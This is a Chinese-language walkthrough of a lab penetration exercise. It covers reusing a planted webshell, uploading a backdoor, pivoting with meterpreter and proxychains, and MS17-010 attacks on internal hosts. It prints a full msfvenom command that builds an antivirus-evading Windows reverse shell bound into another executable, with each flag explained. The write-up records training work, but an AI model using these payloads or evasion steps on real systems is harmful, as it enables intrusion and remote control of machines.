0x01 192.168.2.244攻擊
(1)使用的是之前本科實驗室的同學在192.168.2.244/bigdata上留的一句話木馬
(2)因為本人技術有限,只能采用上傳后門的方式來拿到shell,好在蟻劍足已滿足我上傳木馬的需求。在這一步只需要使用msf生成木馬(使用theFatRat生成的木馬穩定性不怎么滴,而且不能繞過火絨)。最后產生的木馬效果最好如下:
msf>msfvenom -p windows/shell_reverse_tcp LHOST=192.168.4.215 LPORT=6227 -e x86/shikata_ga_nai -x IPradar5.exe -i 5 -f exe -o /root/Desktop/backdoor.exe
-e x86/shikata_ga_nai 此步意為使用shikata_ga_nai的編碼方式對攻擊載荷進行重新編碼,上文有講
-x IPradar5.exe 此步意為將木馬捆綁在指定的可執行程序模版上,此處為IPradar5.exe
-i 5 此處意為使用剛才設定的編碼方式對目標進行5次編碼(多次編碼理論上來講有助於免殺,但是也不一定,畢竟殺軟不是白收費的,免殺技術飛速發展,新的免殺技術一出現就會被各大安全廠商盯上的。。。。)
-f exe 此步意為指定MSF編碼器輸出格式為exe
-o /root/Desktop/backdoor.exe 此步意為指定處理完畢后的文件輸出路徑
本人自己寫了個exe程序來替代IPradar5.exe。能維持住運行就ok。其他的就和該模板一樣了。
(3)使用蟻劍傳大馬
其中halo.exe的免殺與穩定性最好。同時使用該代碼的時候需要注意如果防御方管理員在線,則會直接關掉你的木馬,因此還需對其進行改進,但目前階段來說足夠了。
0x02 跳板機布置
在上一階段,我們拿到了反彈回來的244的shell,這時后滲透階段神器meterpreter就要上線了。
第一步提權,從mysql的數據庫管理員上升到系統權限
第二步 建立路由
第三步,設代理
第四步,proxychains加nmap掃描
在設代理這里總會有一些問題,設置完本地走session的代理之后也不能全局使用proxychains來打。
0x03 攻擊三網段
(1)首先使用ms17_010的掃描模塊
在這里有9,20,23,43這三台主機上存在漏洞。我們開始一台一台來試
(2)展開攻擊
這里打3.9的時候看到有報錯,就很煩。之前connection reset by peer報錯在百度上搜索之后拘束和TCP協議的三次握手有關系,有可能是網速過慢或其他原因。
在這里,運氣爆棚!!!之前打192.168.3.43總會有connection報錯,不過這次會話最終也沒有維持太久。在給一位老哥看環境的時候就無情地斷掉了。(不過跳轉兩個會話地路由看着還是真的舒服)
0x04 打boss
之后果斷接着對1.4的日志服務器逮着445一把梭,最后失敗.....這也是我目前為止走的最遠的一次了。
0xXX 后記
在本次整體的攻擊過程中,見到了多位大佬的神操作。比如3h大佬的爆破密碼技術和修改注冊表繞過不允許空密碼用戶遠程登陸,還有久哥使用ms17_command來實現任意代碼執行。同樣還見識到Cobalt Strike該滲透工具的強大。日后也准備自己租個公網服務器搭上一個。最后,雖然本次攻擊實驗 一邊滲透,一邊運維,晚上有時候還要值夜班為大佬們保證環境的穩定。但是,每一次成功彈回來shell的時候,每一次在熟悉的meterpreter出現在眼前的時候,就會發現這一切都是值得的。